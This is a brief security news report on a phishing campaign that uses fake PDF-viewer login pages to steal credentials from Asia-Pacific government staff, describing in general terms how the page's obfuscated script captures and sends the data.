Government Agencies in APAC Targeted by Fake PDF Login Phishing Emails

Forcepoint X-Labs, a leading cybersecurity research team, has issued an urgent warning regarding a surge in sophisticated phishing emails targeting government departments across the Asia-Pacific (APAC) region. These deceptive emails masquerade as login pages for PDF viewers, luring unsuspecting victims into revealing their sensitive credentials.

The attackers, operating from the email address hachemi52d31[at]live[.fr, have meticulously crafted HTML pages that mimic legitimate PDF viewer login screens. Once a user enters their email and password, the malicious code hidden within the page validates the information and sends it to the attackers’ server.

Masquerading as PDF Viewer Login Page | Image: Forcepoint X-Labs

Unveiling the Phishing Scheme

Forcepoint’s analysis of the phishing code reveals a multi-layered attack designed to evade detection. The attackers employ obfuscation techniques, making the code difficult to decipher. However, researchers were able to decode the malicious JavaScript, revealing its true intent.

The code performs several actions, including:

• Reading values from hidden input fields within the HTML page.
• Listening for user input and triggering actions upon pressing the Enter key.
• Parsing the URL for specific information.
• Validating the entered email address and password.
• Sending the captured credentials to the attackers’ server via an AJAX POST request.

Protecting Against Phishing Attacks

The increasing sophistication of phishing attacks demands heightened vigilance from individuals and organizations alike. Government agencies in the APAC region are urged to take immediate action to protect themselves from this ongoing campaign.